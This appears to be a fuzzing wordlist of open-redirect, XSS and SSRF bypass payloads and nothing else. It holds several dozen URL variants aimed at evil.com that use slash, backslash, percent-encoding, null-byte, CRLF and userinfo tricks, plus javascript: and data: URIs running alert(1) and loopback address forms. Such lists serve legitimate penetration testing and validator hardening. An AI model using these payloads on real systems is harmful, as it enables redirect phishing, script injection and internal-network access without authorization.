https://evil.com
//evil.com
///evil.com
////evil.com
/\\evil.com
\\/evil.com
//evil.com/
//evil.com/%2f..
///evil.com/%2f..
////evil.com/%2f..
https:evil.com
http:evil.com
//evil%E3%80%82com
//evil。com
//%0d%0aevil.com
//evil%00.com
https://evil.com#
https://evil.com?
https://evil.com\\
https://evil.com@legitimate.com
https://legitimate.com@evil.com
https://evil.com%23.legitimate.com
https://evil.com%2f.legitimate.com
javascript:alert(1)
javascript://evil.com/%0aalert(1)
data:text/html,<script>alert(1)</script>
//google.com%2f@evil.com
/\\.evil.com
/.evil.com
/evil.com
https:///evil.com
https:\\\\evil.com
//%252f%252fevil.com
/%09/evil.com
/%2f%2fevil.com
/evil%252ecom
//evil%252ecom
https://%09evil.com
https://%00evil.com
https://evil.com/%2e%2e
//0x7f000001
//127.0.0.1
//2130706433
//[::1]
///\;@evil.com
javascript://%0aalert(1)
/%2f%2fevil.com
/%5cevil.com
\\evil.com
/.%2fevil.com
/..%2fevil.com
/.;/evil.com
/..;/evil.com
/%2e%2e/evil.com
/..%252fevil.com
/https:%2f%2fevil.com
/https:/evil.com
/http://evil.com
/\/evil.com
/\\evil.com
/@evil.com
/.evil.com
//evil.com/
//evil.com?
//evil.com#
//evil.com%00
//evil.com%0d%0a
//evil%00.com
//evil%0a.com
//evil.com%23@legitimate.com
//evil.com@legitimate.com
//legitimate.com@evil.com
//evil.com%2f@legitimate.com
//evil.com?@legitimate.com
//evil.com#@legitimate.com
/%09evil.com
/%0aevil.com
//evil.com%09
//evil.com%0a
//evil.com%0d
